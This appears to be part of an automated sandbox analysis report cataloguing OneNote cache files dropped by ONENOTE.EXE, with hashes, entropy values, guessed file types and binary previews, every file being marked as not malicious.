Preview:	2...>..........................?..........................................................................................................................................................................m.......m..a.G...F.qM..Dq......Dq...FC..+.2..t.Dq...FC..+.2..t.Dq...m..a.G...F.qM...m...............................Dq......Dq..................................................Dq..#...Dq\.....DqN.!....................................................4..1...(...(.......L.i.v.e.C.o.n.t.e.n.t...........1.......L.i.v.e.C.o.n.t.e.n.t................m..c..,....................Dq..1... ..$....L.i.v.e.C.o.n.t.e.n.t.............v.=.q.FC.50!...}....N...^...........................................................................................................v.=.q.FC.50!...}....................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000032.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.9115094211346324
Encrypted:	false
SSDEEP:	6:9/RssLAC5kayL6s8E2BMu8urIYI+yKls6Tx8M4DAC4Ly72BNRyflP3X4ADAgArwk:zPLAC5ka461JKKFCDKjNRmFHvDSQEl
MD5:	2FA30E92EC6BDDA5C1BDF83A33EF4404
SHA1:	8131AD4EE52D9A26E914188DAF37C6723A23A059
SHA-256:	FC91ADB966CC17C447EF3A73D80B81A8D3FE55F1EC01263CCAA0B9372C1AACD7
SHA-512:	0E60E030B3ED6C61279B397B64C045B1D0BC267E64CF8284B821B6D1066F41AA59F6C5A75E72E3F11B106E14D01E6D254BD5668DFD66790DABCFDAD2AFC8BC8F
Malicious:	false
Preview:	....>....................................................................................................................................................................................................O.......O..Qt.I......().............QK..j...C..O..Qt.I......().O.......QK..j...C.......4.R..N...g...e..4...........O.......O...................................................O...+...O.\.....O.N.....O.N.)...............................................c..,.........................4..1...(...(.......1.6.............O...1... ..$....1.6.........4.......4.R..N...g...e.............QK..j...C.2................................O.........................................4..c..,....................O...O...1... ..$....1.6...........M...'..L.^.c...h....N...^...........................................................................................................M...'..L.^.c...h............................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000033.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.403076563231452
Encrypted:	false
SSDEEP:	24:ucEzmxCE6o1FL1gl/VT3lHlqzVnnliblO:u5zm4gzC9xHlwnliRO
MD5:	66CBEA88A991014A5EBE49A7823FD150
SHA1:	5CAEF311279EFBF5C240210A16521F5086695D36
SHA-256:	D04D6C856A8E7F0EBABB13517B420F204AAAC621671DDB6636DBF87D728DA70A
SHA-512:	1EF14587A70902710077358A4AFA9C39FC62D5CA526D35EEB842FA6A03261C5FD7A0BDE08610A2DC16830A1A71AE8502DFFBE34FC1230F23F328222F477BCA46
Malicious:	false
Preview:	.......................................................................................................................................................................................................i.......i......L........d.......d....T.G...?..J........B.lQ.\.q.....d....T.G...?..JZd....&.'..tI...`.....&...........i.......i...................................................i....B..i..\....i..N....i..N...i..N.:..i..N.@..........................d....c..,.........................4..1...(...(.......M.a.n.a.g.e.d..........i....1... ..$....M.a.n.a.g.e.d............................B.lQ.\.q..&.......&.'..tI...`....2...............................i....&....................................&...c..,...................i...i....1... ..$....M.a.n.a.g.e.d.........d.......d....T.G...?..JZ.p.......p.q..N..)..6..i......L........i....p.q..N..)..6...p..........................>................&.'..tI...`..............................................p...c..,...................i...i...i....1... ..$....M.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000034.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7228767498165645
Encrypted:	false
SSDEEP:	6:jxfEIJM5+c5mscof26x8CAXCkfWWAXlSZcw1ESXK:KP3DcofEXnu9XlSZcQESa
MD5:	9D33F4CE4698BA3937BFBE8D8C91D0E5
SHA1:	485B1EEB4ACF2AEEA562011ABAEF8CB2CEC1B2D7
SHA-256:	5F4497D3B5649CD027E7B8E0293E6ABF1A5011A6695791AF57578662291FA6E7
SHA-512:	5DF65B0663C9E93D65037C42362B691DD8C75EAB5546D671B5AC3B49EE867F2B99A887509221F2BD1AF13ECCA6ACC7EDC2F50B7AF77FD6D69842AAA16952A031
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................= ......= .N8.L.......n.......n.-..@.u.T....n.-..@.u.T....n...= .N8.L.......= ...............................= ......= ..................................................= ..!...= \.....= N.....................................................n...c..,.........................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s...........= ..1... ..$ ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s.................k..J...72......N...^...............................................................................................................k..J...72..............................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000035.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.4836053535577858
Encrypted:	false
SSDEEP:	6:NTcRhvBhQ63ESFtyLx8Olu3afPFNPYw1EWNPk:VcvztV38dNPYQEWNPk
MD5:	86CB1FD272539C0CE95CB5016F74D0F7
SHA1:	50A49DC89B981FA400907002882E6A739043F9C3
SHA-256:	37EA96BC424DD31F8D58C90E474F968A72E8B564920C6CFDDFEC0A1AA8CD19D4
SHA-512:	2B649F9FF6BD60D24EB395C6943B9B9E5B525B8BC7F093DF24AD9767AAD63424A2003F3336A4A75AFB29441F7E8D76A687BD67D9C26F485731D14C2DE960BCAC
Malicious:	false
Preview:	2...>...........~.......................................................................................................................................................................................R.......R....b.L......}.........................R....b.L......}.R....................................................R.......R...................................................R.......R..\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3.........J.%.c..C.....N...^.................................................................................................................J.%.c..C.............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000036.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.731857108728666
Encrypted:	false
SSDEEP:	12:KUCyIsW8WdZdcpLeIWv57eIWc1R6mQEb6W:KUcHbkLQ7f6mf6
MD5:	3932E7CF330FF464E5860601DD33B2EA
SHA1:	584DDC873A30CA2803C3770793DF8FF3CA992019
SHA-256:	BA23A282187F4F6055F2E69C5E95B380A9C9C0ACA2B6D7D18C7F7FD779C558F8
SHA-512:	0DA8BEF0B042591AA9E1E1F63BED3B1C253739D86535463C15FCA6C828F7CFAD111AC8ABF4CBBC160141BCA8079C6BB47C5EF2B79CD96012BB9A0DDEADC1A186
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................ez......ez....K..\sTuuB.......B......M.....`.Zez....K..\sTuuez..B......M.....`.ZB................................B.......B...................................................B...."..B..\....B..N....................................................ez...c..,.........................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..............B....1... ..$$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s............Z-.:J...sCA.-....N...^..............................................................................................................Z-.:J...sCA.-....................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000037.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.4792193510929028
Encrypted:	false
SSDEEP:	6:NTca/lX83CPeimCPIk0kCyLx8Olu3afqNYw1EDNk:Vca/9PeYPEkCV38MYQEJk
MD5:	FE5349DFCC599CE7824A0FD67083DACA
SHA1:	6077F8B49EE27EC8842832843CFBFB82AA888C17
SHA-256:	E30B8338685A840DB8D88E87A2FC98716996E811FF80F4E675D8E30A67758340
SHA-512:	A48CC21B6188B229038060B77D00E5464A42729E07C500336EFA7ECAAC1AB1A818E802E08143EC68493C1FB7EA185E7F7630A2DB76D8C57684AEA256C5A56E42
Malicious:	false
Preview:	2...>...........~.......................................................................................................................................................................................?.o.....?.oG8..A......f.........................?.oG8..A......f.?.o..................................................?.o.....?.o.................................................?.o.....?.o\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3....&..nb.I..F..0e....N...^............................................................................................................&..nb.I..F..0e............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000038.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6376640635337497
Encrypted:	false
SSDEEP:	12:UeEkoC5Zp2n6nkNYKQQnkNYVotrlcQETotS:U5C5ZZkNbQQkNommH
MD5:	D1E18CECA023EE022B36EC91EB0AA631
SHA1:	EA3B03A0B2A134ECEB514FE71E2B604E685119BD
SHA-256:	46DBA1E83688E5B923FD3100228573398F91772FDF13A47076A42AB958CA7AF6
SHA-512:	BB2308B4179CB9F665C9AD5D571648BCBD4DE9BC50E7C099ED0A0CA8CF725A6E1FCFB87DA6276236FC0267DA42CB0BD77783E918B4014BA9BE15CA56FD79C291
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................W:~.....W:~...<M.{.S.cp........................W:~...<M.{.S.cpW:~..................................................W:~.....W:~.................................................W:~.."..W:~\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............1...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s.........R..n...@..cV;9HW....N...^...........................................................................................................R..n...@..cV;9HW............................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000039.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.8012804023306926
Encrypted:	false
SSDEEP:	12:+wfEq6OzRhlUhFtlSsD4YwsD4CZAQEfP0:+Rn5wnYwnN
MD5:	CC61DB38E8444BA8F1B80DA60CDDB3D9
SHA1:	9A0F59302C2185FCE0FB160B0795A70103C9FCDA
SHA-256:	B41A7C2F9755215EA37CE1D2B30D148DDB003DFF0A914BAB21B6F02836E3B301
SHA-512:	E515A827FA1A606AAE4388AE88352FE8A0A4FDF4429D26E8928EE3448D392EE48A20619EB32DD95D8DD787AEDA09A304F9235622245CF4425CCC63EF28297156
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................U.%.....U.%r..O..fP.u-.z"A.....z"A.CkGM..#E...+z"A.CkGM..#E...+z"A.U.%r..O..fP.u-.U.%..............................U.%.....U.%.................................................U.%..#..U.%\....U.%N....................................................z"A..c..,.........................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s..............U.%..1... ..$<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s.........[Y..1.N...f0.......N...^...........................................................................................................[Y..1.N...f0.......................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003A.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.4764134317056371
Encrypted:	false
SSDEEP:	12:Vc36hV1l4/iGlV38LOv8o0KiQE1v8o0Ka:ZVL4KGb386v5Ohv5
MD5:	FE4D28A288DBBCFCED95DDAAADC7BED9
SHA1:	A95EEBC35331D287B4133035A741F3C56AB13BB4
SHA-256:	3BC62360D8292721E562D5777A684E6F0BB5247D2BF7434473016A3CEED10966
SHA-512:	BA6848996A498FD0820677BD99742CAED62D96DEE436FE5247E1001772CFDF729B468AB7F6563859E8EF91BB9428D2FC234E584C4AAEA68DF871F149C7EC7532
Malicious:	false
Preview:	2...>...........~.........................................................................................................................................................................................`.......`...N...rd.............................`...N...rd.....`....................................................`.......`...................................................`.......`\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3......+A..D..QX.5......N...^..............................................................................................................+A..D..QX.5..............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003B.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	big endian ispell hash file (?), 8-bit, no capitalization, 26 flags
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.4645181443505395
Encrypted:	false
SSDEEP:	12:NX8lpgfuMjgnXM7Z/v51dD12SC0WJhdNaIf6x+nC3Udugad7sjlcQEwXYsa:RSpa1jgWBMkWt0ig+CsuB7ecEo
MD5:	757B9440260201C2DDC2CCCCFAD624CD
SHA1:	A13513952B03E3FF5C8330B35EB2AAADF9BD781C
SHA-256:	50D82D6E6CB2208CC8A405E0C1F1000FB244B096611E9728B2F05A0344E664CC
SHA-512:	2FEE61805D7F1DEC676B6CFE7CA24155A552ECEA21A66D2DCB189AC7E8C3D87514C7DE3302A42C7E0EE8DBA852E6F6F05E5EDC08A8F9F8300123F79668C7445A
Malicious:	false
Preview:	........ .............................?.................................................................................................................................................................._r......_r[..;M..i\.n<..\{......\{6.H.E.s....;899....?A...O.i1.99.......Y.B..P..>.......\{6.H.E.s....;8.\{..........99......99..................................................99...@..99.\....99.N....99.N.)..99.N.9..99.N.>...........................\{..c..,.........................4..1...(...(.......U.s.e.r........99...1... ..$....U.s.e.r.........................C..0.j.99......99....?A...O.i1.2................................\{...........................................c..,...................99..99...1... ..$....U.s.e.r....................Y.B..P..>..99......99....?A...O.i1.......C..0.j......\{6.H.E.s....;8.\{.._r[..;M..i\.n<.._r.....>....................Y.B..P..>................................................c..,...................99..99..99...1... ..$....U.s.e.r...................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003C.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7172662883928961
Encrypted:	false
SSDEEP:	6:jxfEhhHIHiUn7en/ZiHdlqQ0hx8CAXCkIi5DWAXlfWG1Yw1EuG1k:KDqi++/QnV5Xnnd9XlfD1YQEb1k
MD5:	E180491CBA3FF394526B136CA88F51FE
SHA1:	1D79D54ED63EA9AAEF4E9234AE318D2739E392DE
SHA-256:	E22420A2198FD80C22317E2C0FCA1215319C1C9F8B62B176F72E7A16623978B8
SHA-512:	C7D376A6B52FAA09DF5A0860AFC57B306732638463B1F0D648C0462CFE96A03CDAF2153F6DED2AFB22C35AE0B79F3F25672D7777C9FF8B298FBCF908CE4652F7
Malicious:	false
Preview:	2...>................................................................................................................................................................................................... O...... O....N....&[.Lr......Lr....jL..jt..hMLr....jL..jt..hMLr.. O....N....&[. O...............................Lr......Lr..................................................Lr...!..Lr.\....Lr.N.................................................... O...c..,.........................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s..........Lr...1... ..$ ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s...............&..""C..=.........N...^.............................................................................................................&..""C..=.................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003D.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.47889729386170565
Encrypted:	false
SSDEEP:	6:NTc/Z2lPZ9Umjy6iaiyLx8Olu3af6008w1Ev00A:Vc/ZAZ9Ur6sV38nQE2
MD5:	05E651319CAF00377A9ABE7062F64DAA
SHA1:	E007451CA7FC6B2661BDC2C2D4EAC488EB7501EF
SHA-256:	6FB337BCF659AD620B1D999D95351F9FEA7A9B1B33D46B20D2C0F688DC1A0F19
SHA-512:	AD594B4300945676F2B87719F3F07D2C9FD9A2426A4F14EB546D101E2EA5B913E8052B8E50C8DA999C1CEAEC29A0701FCDBB6D72639550134D7CA856C57DDE09
Malicious:	false
Preview:	2...>...........~.........................................................................................................................................................................................\.......\J.A..................................\J.A.........\....................................................\.......\...................................................\.......\\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3....p$..'.J.......S....N...^............................................................................................................p$..'.J.......S............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003E.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.733289712388019
Encrypted:	false
SSDEEP:	12:KUCcxk4MzWieIW55n7eIWc1MAPvyKQEx3Pvyy:KUvRiK5n76qvyKt/vy
MD5:	9CBD255E2944BB43EDB3935A1884CE46
SHA1:	A63E22552F8A82A10ADA7D9C90FD505114895F4C
SHA-256:	D65FB7FBDFDB273637DCB6FB8A2624E63DACED61DEAAD71272AE637EE67EB95C
SHA-512:	7ADB0033A959C3117409E338FCEAEFB12065FECFDC818AF7C561A024E50BEC790C145D7947CAFCFF3251E02D0629364D215ACEBBEC31D3218400209A58974F1B
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................H.2.....H.2..1K.....mO.............b.M..@.B..yH.2..1K.....mOH.2......b.M..@.B..y..................................................................................................".....\.......N....................................................H.2..c..,.........................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s...................1... ..$$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..........b...j.C..T.LLe.....N...^............................................................................................................b...j.C..T.LLe.....................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003F.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.48203566128657704
Encrypted:	false
SSDEEP:	6:NTcJ8ElMmDRyLx8Olu3af7Etqw1EGTEtS:VcJ8ElMmDRV387EtqQEGTEtS
MD5:	13A45FE5FD002D98409124D9618B45A2
SHA1:	EE36D3F4FC6867BBF54D1FB1A6E8F1F2A01E802D
SHA-256:	760303624C71072AE13EE147FB04E5D10E0C2D3361C6628ED5FD87B1CBD7C233
SHA-512:	8E98E1AB5FEA80F36D8154438FB8BCDA8C3CF73519D34B0B81765B775CC16AF976BC41423ED13BE7810903CB884798FBC36E6C6908F7DF84D658AE31EB07339D
Malicious:	false
Preview:	2...>...........~........................................................................................................................................................................................4......4.FVoC..`.k_...........................4.FVoC..`.k_...4...................................................4......4..................................................4......4\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...F...}.G.\...X......N...^...........................................................................................................F...}.G.\...X..............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003G.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6501433451062505
Encrypted:	false
SSDEEP:	6:UWBEt4NLHlXAIHLx88cbrMkq2Sz1MQQcbrMkq2Sz1rfgcw1EIEfqK:UeEt4N7lQGnkNYKQQnkNYlocQEIEZ
MD5:	DBE2397B629BD6E35853E162DF01C125
SHA1:	7A99084FA7D4ADAA9EB99B3C906D6FD1DABC100A
SHA-256:	07589626F54E59A0A5D2F7F24C5A85D254E1D36DFFEECBD5D92D33B1848102CE
SHA-512:	163C04BE3B99266DB61BB64BED4777987113F4AA741E1067E1D3E558C47CC72F998E75880C95E3DA1D2171691BC149DADA2C2CBE21BBB511696E20CCCACA2A6F
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................T.......T...oUC.v....Y_.........................T...oUC.v....Y_.T....................................................T.......T...................................................T..."...T.\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............1...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s..........j..f.N....G.......N...^............................................................................................................j..f.N....G...............................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003H.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.8003991424492383
Encrypted:	false
SSDEEP:	12:+wfEsC3UHsC6dVNo5zsD4+8DwsD4ChbAw3cQEnbAwQ:+0C32sC6d/0n+gwn0Aw3c3Aw
MD5:	4C24498FA5E90BDAE300438213DB595E
SHA1:	2A77B5531CCE87493A7DFE894197AC0830395DBF
SHA-256:	37DE8425A199C33FA56477FBBECEA56B618D83A8D130511C85F3DFDE6DC906A6
SHA-512:	A3FA7B4B0DB3F36B6D510FB0B1C5B37A10E662F184106BAEA8ECE87B0179B845A3F7E42DFFCF2B0D8A65AA5771DFCFB43E2F761EA0F83C0736611A4CA8E7721F
Malicious:	false
Preview:	2...>.....................................................................................................................................................................................................h.......h..T.F.......%.q.......q.7.>.A..m8.s..q.7.>.A..m8.s..q....h..T.F.......%..h...............................q.......q...................................................q...#...q.\.....q.N......................................................h..c..,.........................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s...............q...1... ..$<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s.........NE7.K..K.)e.s;.....N...^...........................................................................................................NE7.K..K.)e.s;.....................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003I.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.4796167965043822
Encrypted:	false
SSDEEP:	6:NTcULwlyQLOrOgqPftyLx8Olu3afM3mT2liw1EDmT2la:Vc+wlL4z0VV38M2T2liQEiT2la
MD5:	02BC85FFFEF7A77888B4AB46B6E3184F
SHA1:	F75D8B703B8EFCFDA988D042857A3B05F9B9FAD2
SHA-256:	4448E5D2A911BA923F77F8ECA5CD2CFB8F716D7B646988C75E3DCF63EC2DD728
SHA-512:	E524FB3CF5F31D7C0BFE85B0B9E79BEB65D7E898F15C19B4B78D98FE46862CECFDF5D989D41073990A5563E020586BAC14E5A8038AB68EE1141598BB332F9472
Malicious:	false
Preview:	2...>...........~.......................................................................................................................................................................................6j......6j.a..^C....#;77........................6j.a..^C....#;776j...................................................6j......6j..................................................6j......6j.\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3....-...K.J.r....g.....N...^............................................................................................................-...K.J.r....g.............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003J.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6972669373014362
Encrypted:	false
SSDEEP:	12:ghC+G/GCxaFGC45gMDwV5aDWDwVhLVrQEAxVn:gFVCE8CAgPV5aDpVBVrMxV
MD5:	A536BCA1E4059AB82E012C3A9CA81789
SHA1:	0A78BB3115A784A9041141B79D625B1C4283417A
SHA-256:	B58297204F334AD3955B150123DEA0602BF080F81848693AEE839A828BCF2E8F
SHA-512:	824E5EDD751A077E2D9D97E2F0F6E96158011FAB82656DE25ACFEDAE58B9176559EA1A61C731B0B62E715CA4624221D1C829774CB2089EEF3E2C92102F837C09
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................u.......u..N...J.[zL...m=6.....m=6.Q..N.D.$cg..u..N...J.[zL...u...m=6.Q..N.D.$cg..m=6..............................u.......u...................................................u....!..u..\....u..N....................................................m=6..c..,.........................4..1...(...(.......L.i.v.e.C.o.n.t.e.n.t..........u....1... ..$....L.i.v.e.C.o.n.t.e.n.t..............B.....A...{..i.....N...^............................................................................................................B.....A...{..i.............................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003K.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.9130855199093662
Encrypted:	false
SSDEEP:	6:9/Rsso0tRJXST8SIbJXkKtT1gls0Ex8Ms5Ay+l/BB83+vK3jNABHrw1EIHn:zPoUFS4nFNtRgVvctXzvKTNoQEa
MD5:	8486275A27CB9F412E86AD8DB92BACAE
SHA1:	6791A042AD12A2CA761848574AD45BAD4C3D93FE
SHA-256:	91BF992682561B5972A03F69BC610BE9400A5CA37DE4B3D043DFCE0C104AAE6E
SHA-512:	6CC76B6020AE10D3294F68D3C24259659FB74E9D48BC380682CE8921D24BDE03FE46E5232D9957EF5E8F56B1F98F28E4EE548972969114E8A73B3EE2D1FD6DA6
Malicious:	false
Preview:	....>....................................................................................................................................................................................................l.......l.,p.J.,}<..)............6>.D.q.;B>f....6>.D.q.;B>f......fB.w/.G....j@..fB..l.,p.J.,}<..)..l............................................................................+.....\.......N.......N.)...........................................l...c..,.........................4..1...(...(.......1.6.................1... ..$....1.6........fB......fB.w/.G....j@............6>.D.q.;B>f.2................................l........................................fB..c..,............................1... ..$....1.6...........-.;.0.\G..P."]MX....N...^...........................................................................................................-.;.0.\G..P."]MX............................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003L.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.4527222659028272
Encrypted:	false
SSDEEP:	12:uWPUypMUdMWa8mcROUtUaPEUasX4e27j5gEUaHMo0kGwGyduocAnEUamaEUa2HRu:ucHpNdeUObSlajelO0kVRk8lralU
MD5:	D88CC9CD5C146AF67C7BD7190E5CEE88
SHA1:	65E58529CE70865F2E9BC621F2EEAF7F42BC1516
SHA-256:	14C6C456E308C614F8349C417667F7FB7B59ACDBD2A09010376BC7EB2E9F45B3
SHA-512:	27E8CDA4AEE76EAC99E8489F76ACAA7965A3835F1CE3C203B7D1883F9B54459264C1BA1BBFE7E1F78D4867D47067A11562CC4B2B46EE2807030B366C5CF56599
Malicious:	false
Preview:	..................................................................................................................................................................................................................._..N.n9z6l..t5......t5.L..@.D.4F...t5.L..@.D.4F...t5.....C..\A..m..P4......f.a...A..v.g6..f............f.......f...................................................f...B...f.\.....f.N.....f.N....f.N.:...f.N.@..........................t5...c..,.........................4..1...(...(.......M.a.n.a.g.e.d...........f...1... ..$....M.a.n.a.g.e.d........................C..\A..m..P4..f.......f.a...A..v.g6.2....................................f........................................c..,....................f...f...1... ..$....M.a.n.a.g.e.d.........t5......t5.L..@.D.4F...&.......&.....E...\|...&.....E...\|...&......._..N.n9z6l............................>................f.a...A..v.g6..........................................&....c..,....................f...f...f...1... ..$....M.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003M.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7151578704080009
Encrypted:	false
SSDEEP:	12:KACWnnB9/xnnAlibThXnpD9XlgTLQEHTH:3nBznAlwXpD90LDT
MD5:	9DA20E622738933C7725B9A89F06FD81
SHA1:	B3B8624720E5EE5888512C058FBED4A7D2BA7A50
SHA-256:	3AEE375867AAD392283564F41D624D524A3F638CB6FB60F21BCC4300E17A668A
SHA-512:	6A0D0E23450D3AD59CEA68F315ECE64CD03A356E3916E06AB51B2671B26B88338D58DF7AE0C3E39157919820A52BB454C8B187477FCC80622E16503CCD7FE7F9
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................$.......$.p...N....N..N0.L.....0.L....K...Yb..0.L....K...Yb..0.L..$.p...N....N..N.$...............................0.L.....0.L.................................................0.L..!..0.L\....0.LN.....................................................$...c..,.........................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s..........0.L..1... ..$ ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s..............$...<M.... g.....N...^............................................................................................................$...<M.... g.............................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003N.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.4804976738817115
Encrypted:	false
SSDEEP:	6:NTcHpiLiKxhlAk4h3xRyLx8Olu3afeQc9sZcw1EkocQc9sXK:Vc8xzAxh3xRV38YpQEkPSK
MD5:	1F61104975BC409993B31CEA4AC6472D
SHA1:	4FD2B2D2D84856C7847975E5E1445975A7C6E682
SHA-256:	184D3CC0D73A0EE173564645359997DE8237E4F22D8DFE96BE4309D15CEDBEFF
SHA-512:	F8B9C61B2E4E840733297F7F01A0FFB2AD21018D32136FB097DF0E0BC74473EA9A38D869446F38FCEBFE15F5FDF276DEDA537AB13CC4B9F1FA625ED5E3868653
Malicious:	false
Preview:	2...>...........~.........................................................................................................................................................................................].......]&]..F..-g.&4...........................]&]..F..-g.&4...]....................................................].......]...................................................].......]\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...4..K.+.L.3..[.H....N...^...........................................................................................................4..K.+.L.3..[.H............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003O.bin (copy)

Download File

